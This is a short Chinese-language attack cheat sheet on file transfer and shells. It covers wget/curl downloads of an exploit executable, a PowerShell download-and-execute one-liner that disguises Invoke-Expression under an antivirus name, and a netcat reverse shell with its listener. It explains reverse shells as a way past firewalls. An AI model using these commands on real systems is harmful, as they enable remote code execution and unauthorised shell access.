文件下载

文件下载命令生成器

Linux

使用wget、curl等命令,如:

wget http://127.0.0.1:8080/ms10-051.exe -O exploit.exe
curl http://127.0.0.1:8080/ms10-051.exe -o exploit.exe

Windows

使用powershell,如:

powershell set-alias -name kaspersky -value Invoke-Expression;kaspersky(New-Object Net.WebClient).DownloadString(‘http://127.0.0.1:8080/payload.ps1')

正向连接

假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器,这是比较常规的形式,我们叫做正向连接。
远程桌面、web服务、ssh、telnet等等都是正向连接。

反向连接(反弹Shell)

受害者主机主动连接攻击者的服务端程序,即为反向连接,也叫反弹Shell。
反弹Shell生成器
Q:为什么要用反弹shell呢?
1.目标机因防火墙受限,目标机器只能发送请求,不能接收请求。
2.目标机端口被占用,由于防火墙策略可能合法的ssh连接等都会被阻断。
3.目标机位于局域网,或IP会动态变化,攻击机无法直接连接。

例:通过nc反弹Shell
攻击机:开启监听
nc -lvnp 8888
靶机:主动连接
nc 攻击机ip 8888 -e /bin/bash